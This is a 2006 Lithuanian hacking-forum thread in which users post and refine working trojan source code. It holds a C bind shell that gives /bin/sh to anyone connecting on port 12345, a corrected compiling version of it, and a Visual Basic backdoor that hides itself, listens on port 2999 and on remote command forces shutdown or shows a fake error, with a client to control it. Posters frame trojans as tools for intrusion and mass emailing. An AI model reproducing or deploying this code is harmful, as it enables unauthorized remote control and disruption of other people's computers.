Trojanai
Taigi papostinkite savo programavimo žinias. Čia mes programuojam trojanus / backdoors / rootkit'us / gal net pabandysim parodyt kaip reikia rašyt virusus.
Visa informacijai išskirtinai mokslo tikslais.
Prašau nepostint, durnų postų išreiškiančių durnas mintis nesusijusias su programavimu. Kas nors neaišku su c , c++ , asm , kitom programavimo kalbom rašykit, padėsiu kuo galėsiu
Visa informacijai išskirtinai mokslo tikslais.
Prašau nepostint, durnų postų išreiškiančių durnas mintis nesusijusias su programavimu. Kas nors neaišku su c , c++ , asm , kitom programavimo kalbom rašykit, padėsiu kuo galėsiu
Paskutinį kartą redagavo shellc0de 2006 06 17 09:25, redaguota 1 kartą(us).
Informacija padrika ir mazai naudinga. Praverstu nebent tiem kas apie trojanus girdejes iki tol tik is antivirusiniu reklamu arba isvis nieko negirdejes.
Ypac nenaudinga linko neduosiu ir pan. vaikisko lygio blevyzgos: nenori duot info, pasidalint ziniom - nerasyk straipsnio. Akivaizdu. Paskaicius senesnes temas galima rast desimtis kartu daugiau info apie tikrai efektyvius ir isbandytus trojanus. Gal ir nlb grazu taip sukritikuot pirma bandyma, bet tikiuosi nesupyksi.
Trojanai nors is vienos puses yra pelne neslove uz veikla: idek trojana i maila isiusk i 1 000 dezuciu.. Is kitos puses tai nepakieciami irankiai bet kokiame tikrai rimtame isilauzime, o ne zemo lygio DoS atakose kuriu dabar daug ir kuriu atlikejai megsta labai nepagrystai pasikelti pries kitus "kolegas".
Ypac nenaudinga linko neduosiu ir pan. vaikisko lygio blevyzgos: nenori duot info, pasidalint ziniom - nerasyk straipsnio. Akivaizdu. Paskaicius senesnes temas galima rast desimtis kartu daugiau info apie tikrai efektyvius ir isbandytus trojanus. Gal ir nlb grazu taip sukritikuot pirma bandyma, bet tikiuosi nesupyksi.
Trojanai nors is vienos puses yra pelne neslove uz veikla: idek trojana i maila isiusk i 1 000 dezuciu.. Is kitos puses tai nepakieciami irankiai bet kokiame tikrai rimtame isilauzime, o ne zemo lygio DoS atakose kuriu dabar daug ir kuriu atlikejai megsta labai nepagrystai pasikelti pries kitus "kolegas".
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
__________________________________________
progenic.com
library.2ya.com
GodHack kaip ir visada taiklūs komentarai, infromacija padrika, kad žmonės parodytų savo lygį informaciją papildydami ir pataisydami. Aš nepykstu, beto nepirmas bandymas Bėje šitam forume ir tėra tokie žmonės kurie apie trojanus girdėję iš AV reklamų. ( na gal išskirkim tave, mane ir braina(taip tą brain5ide(kad ir kaip nemalonu) )GODhack rašė:Informacija padrika ir mazai naudinga. Praverstu nebent tiem kas apie trojanus girdejes iki tol tik is antivirusiniu reklamu arba isvis nieko negirdejes.
Ypac nenaudinga linko neduosiu ir pan. vaikisko lygio blevyzgos: nenori duot info, pasidalint ziniom - nerasyk straipsnio. Akivaizdu. Paskaicius senesnes temas galima rast desimtis kartu daugiau info apie tikrai efektyvius ir isbandytus trojanus. Gal ir nlb grazu taip sukritikuot pirma bandyma, bet tikiuosi nesupyksi.
Trojanai nors is vienos puses yra pelne neslove uz veikla: idek trojana i maila isiusk i 1 000 dezuciu.. Is kitos puses tai nepakieciami irankiai bet kokiame tikrai rimtame isilauzime, o ne zemo lygio DoS atakose kuriu dabar daug ir kuriu atlikejai megsta labai nepagrystai pasikelti pries kitus "kolegas".
Na kad visokie idiotai neknistų proto, pabandysiu pažvelgti į trojaną iš vidaus ( jo source code ) Nemanau kad visi čia esantys "hakeriai" viską supras, todėl jei kas neaišku klauskit
Taigi po trijų valandų terliojimosi su nano ir gcc pasaulį išvydo dar vienas trojanas skirtas nix sistemai, bet galima paleist ir ant windows :)Ką ??? PRADEDAM:
1. Surenkam reikalingus lib'us
2. Nurodom kokio porto klausys musu kurinys, ir koki shell'a jis paleis
3. Sukuriam main funkcija
3.1 I ja irasom pasveikinimo zinute
3.2 Surasom socketo kintamuosius
3.3 Pati idomiausia dalis trojano smegenys
Stai pats paprasciausias trojanas, jei kas neaisku pm man ir paaiskinsiu na aisku jei adminas manes iki tol neuzbanins.
Siuo metu as apsistojes ties rimtu trojanu rasymu, kai bus kas nors parasyta pateiksiu, laukit ir sekmes.
Kas sake kad lietuviai trojanu neraso ?
shellc0de 2006
Taigi po trijų valandų terliojimosi su nano ir gcc pasaulį išvydo dar vienas trojanas skirtas nix sistemai, bet galima paleist ir ant windows :)Ką ??? PRADEDAM:
1. Surenkam reikalingus lib'us
Kodas: Pasirinkti visus
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h>
Kodas: Pasirinkti visus
#define P 12345
#define SH "/bin/sh"
#define LISTN 5
Kodas: Pasirinkti visus
int main(int argc, char **argv)
Kodas: Pasirinkti visus
char *fst = "\nConnected!\n\n";
char *sec = "This tool demonstrated how works trojans\n";
char *thr = "Please enter each command followed by ';'\n";
Kodas: Pasirinkti visus
int outsock, insock, sz;
struct sockaddr_in home;
struct sockaddr_in away;
Kodas: Pasirinkti visus
home.sin_family=AF_INET;
home.sin_port=htons(P);
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);
signal(SIGCHLD,SIG_IGN);
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0)
exit(printf("Socket error\n"));
if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0))
exit(printf("Bind error\n"));
if((listen(outsock,LISTN))<0)
exit(printf("Listen error\n"));
sz=sizeof(struct sockaddr_in);
for(;;)
{
if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0)
exit(printf("Accept error"));
if(fork() !=0)
{
send(insock,fst,strlen(fst),0);
send(insock,sec,strlen(sec),0);
send(insock,thr,strlen(thr),0);
dup2(insock,0);
dup2(insock,1);
dup2(insock,2);
execl(SH,SH,(char *)0);
close(insock);
exit(0);
}
close(insock);
Siuo metu as apsistojes ties rimtu trojanu rasymu, kai bus kas nors parasyta pateiksiu, laukit ir sekmes.
Kas sake kad lietuviai trojanu neraso ?
shellc0de 2006
"shellc0de" Tai ką tu parašiai apie trojano vidų manau suprato tik keli žmonės, o tie kas suprato jiems tai jau ne naujiena turbūt. Šita tekstą apie trojano vidų kaip ir trumpą pamoką pats parašiai ar nukopinai, nes kai jį perskaičiau man atrodo, kad padariai copy>paste. Bėje jeigu ant visų važiuosį ir negerbsi kitų vartotojų nuomonės ilgai čia nebūsi, nors ir kaip tu sakiai, kad prisikelsi, bet iš to jokios naudos ;] Kodėl sakai, kad tave turėtų užbaninti adminas?
Get your ambition or die trying
Truputi pataisytas ir veikiantis variantas:
Edit, ant windows programa neveiks
Kodas: Pasirinkti visus
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h>
#include <iomanip>
using namespace std;
#define P 12345
#define SH "/bin/sh"
#define LISTN 5
int main(int argc, char **argv){
char *fst = "\nConnected!\n\n";
char *sec = "This tool demonstrated how works trojans\n";
char *thr = "Please enter each command followed by ';'\n";
int outsock, insock, sz;
struct sockaddr_in home;
struct sockaddr_in away;
home.sin_family=AF_INET;
home.sin_port=htons(P);
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);
signal(SIGCHLD,SIG_IGN);
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0)
exit(printf("Socket error\n"));
if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0))
exit(printf("Bind error\n"));
if((listen(outsock,LISTN))<0)
exit(printf("Listen error\n"));
sz=sizeof(struct sockaddr_in);
socklen_t len = sz;
for(;;)
{
if((insock=accept(outsock,(struct sockaddr *)&away, &len))<0)
exit(printf("Accept error"));
if(fork() !=0)
{
send(insock,fst,strlen(fst),0);
send(insock,sec,strlen(sec),0);
send(insock,thr,strlen(thr),0);
dup2(insock,0);
dup2(insock,1);
dup2(insock,2);
execl(SH,SH,(char *)0);
close(insock);
exit(0);
}
close(insock);
}
}
Mūsų darbas tamsoje -
Mes darome tai, ką mokam,
Atiduodame tai, ką mokam,
Mūsų darbas - tamsoje.
Abejonės virto aistra,
Aistra gi - ištirpo laisvėje.
Visa kita - menas
Išlikt savim beprotybėje.
Mes darome tai, ką mokam,
Atiduodame tai, ką mokam,
Mūsų darbas - tamsoje.
Abejonės virto aistra,
Aistra gi - ištirpo laisvėje.
Visa kita - menas
Išlikt savim beprotybėje.
Na ziuriu rasom sorsus tai reik rasyt ir kas ant windows weiks:
VB:
Visi zinoms kad alt+ctl+del SUX tai sita kodo dalis tai isprendzia.
Paislepiam dar geriau. Dabar jau vidutinis vartotojas musu neberas.
Esmine dalis atidarom portus
Sita vietele priima susijungima ir paleizdia sekancia funkcija
MSG BOX cheche. be to atkreipiam demesi i shutdown.
Sweikinu trojanas baigtas.
******************
BENDRAS VAIZDELIS:
MAIN
MODULE
````````````````````````````````````
Dar galim parasyt kienta to trojano va taip:
Va tep wyksta su windows ir VB viskas.
VB:
Kodas: Pasirinkti visus
Private Sub Form_Load()
Me.Visible = False
End Sub
Kodas: Pasirinkti visus
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub
Kodas: Pasirinkti visus
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Kodas: Pasirinkti visus
Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
Kodas: Pasirinkti visus
Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function
Sweikinu trojanas baigtas.
******************
BENDRAS VAIZDELIS:
MAIN
Kodas: Pasirinkti visus
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub
Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
Kodas: Pasirinkti visus
Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function
````````````````````````````````````
Dar galim parasyt kienta to trojano va taip:
Kodas: Pasirinkti visus
Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub
Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub
Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub
Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
__________________________________________
progenic.com
library.2ya.com
Dėja, bet taip nemanauGODhack rašė:Jis matyt mano, kad cia pas mus virusu iseities kodu postijimas didelis nusikaltimas.
Todėl, kad nepirmas kartas ] turiu savu priezasciu. O ne bl, ne copy paste. Tu žmogau pagalvok ( nors jei Jūs rašydami kokios nors programos source code visko nepatikrintumėt ir rašytumėt tiesiai į forumą, tai būtumėt didžiausias asilas kokį aš esu matęs. O iš čia antra problema : jei jūs viską patikrinot ir paskui dar kartą viską perrašinėjat tai irgi esate didžiausias asilas pasaulyje ) Jei kas nesupranta. Prašom rašykit man privačią žinutę ir viską paaiškinsiu. Dėje nei vienas šitam forume ( išskyrus GODHack ) nenusipelnė, kad AŠ su jaus elgčiausi pagarbei. Dėja, jeigu žmonės suteikia man malonumą pažiūret į jų lygį , tai ...MaksasMks rašė:"shellc0de" Tai ką tu parašiai apie trojano vidų manau suprato tik keli žmonės, o tie kas suprato jiems tai jau ne naujiena turbūt. Šita tekstą apie trojano vidų kaip ir trumpą pamoką pats parašiai ar nukopinai, nes kai jį perskaičiau man atrodo, kad padariai copy>paste. Bėje jeigu ant visų važiuosį ir negerbsi kitų vartotojų nuomonės ilgai čia nebūsi, nors ir kaip tu sakiai, kad prisikelsi, bet iš to jokios naudos ;] Kodėl sakai, kad tave turėtų užbaninti adminas?
Dabar prisijungę
Vartotojai naršantys šį forumą: 5 ir 0 svečių